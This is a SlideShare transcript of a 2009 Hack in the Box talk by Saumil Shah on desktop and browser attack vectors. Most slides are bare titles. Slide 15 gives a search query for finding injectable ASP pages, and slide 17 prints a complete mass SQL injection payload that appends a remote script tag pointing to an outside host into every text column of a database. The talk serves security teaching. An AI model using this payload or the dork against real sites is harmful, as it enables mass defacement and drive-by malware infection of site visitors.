Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

How to own the world, one desktop at a time

1,445 views

Published on

As 2009 comes to a close, we look back on the bugs of our days. The past few months have seen some interesting attacks. This talk takes a look at some of the most effective attack vectors of 2009. These, coupled with classic web hacking, social engineering and a bit of cleverness, increase the attack surface manifold. This year, my work goes beyond just browsers and looks at examples of mass ownage, new infection vectors, advanced client-side exploitation, malicious payloads, browser infection with toolbars and more.

Published in: Technology, News & Politics
  • Be the first to comment

How to own the world, one desktop at a time

  1. 1. How to own the world,one desktop at a time<br />Saumil Shah, Net-Square<br />Hack in the Box<br />Kuala Lumpur 2009<br />
  2. 2. # who am i<br />Saumil Shah, CEO Net-square<br />LinkedIn: saumilshah<br />
  3. 3. I&apos;M IN UR BASE<br />KILLIN UR D00DZ<br />
  4. 4.
  5. 5. &quot;The amount of intelligence in the world stays constant and the population increases.&quot;<br />
  6. 6. The Attack Surface<br />
  7. 7. The Attack Surface++<br />
  8. 8.
  9. 9. Browser Attacks<br />
  10. 10.
  11. 11. Helping Hands<br />Alexander Sotirov, Mark Dowd - Bypassing Browser Memory Protection<br />
  12. 12. Taking your work to the masses<br />SQL Injection<br />XSS<br />
  13. 13. The metamorphosis of script src<br />
  14. 14. Web Hacking<br />
  15. 15. SQL Injection Discovery<br />inurl:&quot;.asp&quot; inurl:&quot;a=&quot;<br />
  16. 16. An example<br />
  17. 17. Mass SQL Injection vector<br />declare @m varchar(8000);<br />set @m=&apos;&apos;;<br />select @m=@m+&apos;update[&apos;+a.name+&apos;]set[&apos;+b.name+&apos;]=rtrim(convert(varchar,&apos;+b.name+&apos;))+&apos;&apos;&lt;script src=&quot;http://is.gd/31337&quot;&gt;&lt;/script&gt;&apos;&apos;;&apos;<br />from dbo.sysobjects objs, dbo.syscolumns cols, dbo.systypes typs<br />where objs.id=cols.id<br />and objs.xtype=&apos;U&apos;<br />and cols.xtype=typs.xtype<br />and typs.name=&apos;varchar&apos;;<br />set @m=REVERSE(@m);<br />set @m=substring(@m,PATINDEX(&apos;%;%&apos;,@m),8000);<br />set @m=REVERSE(@m);<br />exec(@m);<br />
  18. 18. Documents<br />
  19. 19. Penetration Document FormatTM<br />http://blog.didierstevens.com<br />
  20. 20. &quot;Confidence in a connected world&quot;<br />
  21. 21. Security by pop-ups<br />
  22. 22. kthxbai<br />www.net-square.com<br />secure . automate . innovate<br />

×